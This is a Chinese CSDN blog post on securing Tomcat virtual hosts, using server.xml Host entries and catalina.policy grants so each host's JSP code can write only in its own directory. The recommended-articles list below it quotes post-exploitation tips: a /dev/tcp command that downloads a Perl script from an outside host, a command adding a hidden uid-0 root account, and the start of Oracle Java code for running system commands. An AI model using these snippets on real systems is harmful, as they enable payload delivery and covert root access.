Tomcat虚拟主机的安全配置

最新推荐文章于 2020-02-28 14:40:22 发布
最新推荐文章于 2020-02-28 14:40:22 发布
阅读量1.1k 收藏
点赞数
分类专栏: 软件配置 文章标签: tomcat file html jsp 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yoti/article/details/134002
版权


由Tomcat构建支持JSP的虚拟主机,目录结构如下:
/www/hosts
      ├host1
      │ ├html
      │ ├webapps
      │ └logs
      └host2
         ├html
         ├webapps
         └logs
Tomcat的配置文件相关内容如下:
<Host name="host1" debug="0" appBase="/www/hosts/host1/webapps" unpackWARs="true" autoDeploy="true">
    <Context path="" docBase="/www/hosts/host1/html" debug="0"/>
</Host>
<Host name="host2" debug="0" appBase="/www/hosts/host2/webapps" unpackWARs="true" autoDeploy="true">
    <Context path="" docBase="/www/hosts/host2/html" debug="0"/>
</Host>
在$CATALINA_HOME/conf/catalina.policy文件中增加以下内容:
 grant codeBase "file:/www/hosts/host1/-" {
      permission java.io.FilePermission "file:/www/hosts/host1/-", "write";
 };
 grant codeBase "file:/www/hosts/host2/-" {
      permission java.io.FilePermission "file:/www/hosts/host2/-", "write";
 };
OK,用以下命令启动Tomcat
$CATALINA_HOME/bin/catalina.sh start -security
此时虚拟主机host1中的JSP/servlet只能够修改/www/hosts/host1目录下的文件,虚拟主机host2中的JSP/servlet只能够修改/www/hosts/host2目录下的文件,从而达到隔离各个虚拟主机的目的。

以上内容仅在本机测试通过(WinXP pro + Tomcat 5.0.12)。

yoti
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
TOMCAT介绍--自定义配置Host
java落花雨的博客---
11-08 2280
tomcat服务器介绍,Host配置的三种方式详细介绍。
tomcat服务器避免恶意域名注册
wanhongbo029的博客
03-14 310
其他的域名指向了自己的IP地址,比如www.ytu.edu.cn是我学校的正常域名,经常有恶意域名指向这个IP地址202.194.116.18,比如www.uxwm.com,也指向了这个IP地址,IP地址绑定域名,仅通过该域名可以访问这个IP地址; 修改tomcat 7的server.xml配置,在&lt;Engine&gt;增加属性defaultHost="notexists" &lt;...
tomcat 的HTTP Host 头攻击原理以及如何防御
happydecai的博客
06-13 5563
修改tomcat的server.xml文件即可: 直接上图:
目标URL存在http host头攻击漏洞tomcat修复方法
xhyyyyy的博客
03-28 1万+
最近扫描发现很多系统web存在http host头攻击漏洞,报告里面的解决方案没有具体写tomcat如何操作,故记录一下整改方法。打开conf    server.xml文件,完善&lt;Host/&gt;元素&lt;Host/&gt;属性:name:主机域名appBase:该主机下的所有应用所在的文件目录比如修改name = “localhost”为 name = “www.xxx.com”...
apache-tomcat-9.0.19 配置unpackWARs="false"导致spring注入失败问题记录
lixiufei_1028的博客
02-28 2758
运行环境: OS:window7旗舰版 Service Pack1 server : apache-tomcat-9.0.19 JDK:1.8.0_221Java HotSpot(TM) 64-Bit Server VM (build 25.221-b11, mixed mode) 问题描述: 在myeclipse使用maven-3.6.3将项目打成war后放在tomcat下...
tomcat虚拟目录和虚拟主机配置
07-13
tomcat虚拟目录和虚拟主机配置。照葫芦画瓢就可以,建议先搞,然后再了解原理。 1.可以一个端口地址后面跟多个web,这个可能软件部署的时候用的比较多 2.也可以一个tomcat配置多个站点,绑定多个域名。这种可能是...
tomcat虚拟主机_动力节点Java学院整理
09-30
在多个虚拟主机配置的情况下,Tomcat服务器的顶级元素`<Engine>`起到了关键作用。`<Engine>`的`defaultHost`属性定义了当请求没有明确指定主机名时默认响应的虚拟主机。例如: ```xml ... ... ``` 在此...
Tomcat基于域名的虚拟主机.doc
07-27
Tomcat 基于域名的虚拟主机 Tomcat 是一个流行的开源 Web ...本文详细介绍了如何在 Tomcat 中实现基于域名的虚拟主机,包括安装和配置 Tomcat、定义虚拟主机、创建站点目录和测试页面、启动服务和访问虚拟主机等步骤。
Tomcat虚拟主机配置
09-05
Tomcat虚拟主机配置Tomcat虚拟主机配置是将一台服务器划分为多个逻辑上的独立主机,每个主机都拥有自己的域名和IP地址,或者共享同一个IP地址,并且能够提供独立的Web服务。这样的设置使得一台物理服务器可以...
Tomcat5_x中的虚拟主机配置方法.rar_tomcat_虚拟主机
09-14
本文将详细讲解如何在Tomcat 5.x版本中配置虚拟主机,以便在同一台服务器上运行多个独立的Web应用。 一、虚拟主机的概念 虚拟主机允许在一个物理服务器上设置多个域名或网站,每个域名对应一个独立的应用程序或服务...
Tomcat部署的时候 unpackWARs="true"
05-20 817
在部署项目到Tomcat的时候发现当Tomcat启动的时候,项目并没有解压出来,导致系统传照片的时候找不到路径,因为,系统没有解压,所以找不到路径, 进入地址==>C:\Users\ceshi\apache-tomcat-6.0.30\apache-tomcat-6.0.30\conf\server 找到这一行: <Host name="localhost" ap...
tomcat的Server.xml详解和Host配置
热门推荐
klx502的专栏
12-13 4万+
转自:http://blog.csdn.net/liuxuejin/article/details/9104055 基于以下说法的领悟: 若只配appBase,不配Context 的docBase(appBase和docBase二选一就可以了),则appBase的每个文件夹里都代表一个应用,每个应用都必须放ROOT文件夹,ROOT里则包含web所有文件,如图:
利用Tomcat catalina.policy实现禁止文件读写demo(window版)
往前的娘娘
11-30 2364
概述:java必用的服务器应该就是tomcattomcat涉及内容很多,今天利用catalina.out实现禁止文件读写demo。 1、先决条件 安装好JDK(笔者JDK 1.8) 安装好tomcat(笔者tomcat 7.0) 2、思路 写一个servlet放置到webapps/ROOT目录下, 大家都知道ROOT是tomcat的默认应用。然后网页请求,转发servlet 在ROOT
如何正确对tomcat host进行配置
weixin_30768661的博客
11-19 1136
今天在对tomcathost容器(即虚拟主机配置)进行配置时,发现即使修改了host name的值(默认为localhost),但是仍无法访问web项目的问题(提示域名解析出错)。只能使用默认的值local host进行访问。 如上图,即使将host修改为ui,但仍只能通过locahost访问 无法通过ui进行访问 后来发现还要修改window下的hosts文件进行ip...
Tomcat虚拟主机配置以及web应用配置
雨钓的专栏
04-15 1万+
Tomcat配置
Tomcat启动时Host标签和Context标签的处理导致程序部署多次
来啊 快活啊
09-03 6102
在生产环境中,我们一般会有如下类似的配置
tomcat server.xml 配置详解[转]
kalogen的专栏
10-13 666
元素名 属性 解释 server port 指定一个端口,这个端口负责监听关闭tomcat的请求 shutdown 指定向端口发送的命令字符串 service name 指定service的名字 Connector(表示客户端和service之间的连接) ...
利用oracle执行系统命令
一个码农的笔记
04-11 5985
c:\1.sql create or replace and compile java souRCe named "util" as import java.io.*; import java.lang.*; public class util extends Object { public static int RunThis(String args) { Runtime
Linux ***小常识
weixin_34092455的博客
06-08 79
1.无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl 2.Linux添加uid为0的用户useradd -o -u 0 cnbird 3....
tomcat虚拟主机配置
最新发布
09-08
Tomcat中,虚拟主机配置允许在一台物理机上运行多个独立的web站点,每个站点都是独立运行的,互不干扰。这些站点被称为"虚拟主机"。虚拟主机配置可以基于域名实现。在配置文件中,每一个host就是一个虚拟主机。 要配置Tomcat虚拟主机,需要在service.xml文件中进行相关配置。你只需要对应配置`<Context .../>`这段代码就可以了。这个配置用于定义Tomcat如何管理Java应用,如何对接和连接Java应用。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Tomcat服务(部署、虚拟主机配置、优化)](https://blog.csdn.net/m0_71521555/article/details/126642583)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* [Tomcat虚拟主机配置](https://blog.csdn.net/m0_54434140/article/details/122490378)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值